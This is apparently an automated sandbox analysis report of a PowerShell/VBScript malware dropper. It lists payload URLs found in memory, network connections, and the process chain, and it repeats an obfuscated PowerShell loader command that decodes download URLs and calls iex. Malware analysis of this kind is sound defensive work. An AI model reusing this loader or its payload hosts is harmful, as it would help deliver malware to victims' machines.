          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Su
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sub
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subo
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subor
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subord
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordi
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordin
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordine
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordiner
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinere
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordineren
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerend
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerende
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes7
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.s
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133536C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/90-maschere-per-saldatura
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/cerca
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/contattaci
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/il-mio-account
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/img/logo.jpg
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ordine
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/sitemap
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/themes/PRS070158/css/megnor/custom.css
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.11:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.11:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.11:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.11:49777 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
          Source: classification engineClassification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rml0xkts.2ho.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: mj.ps1ReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte 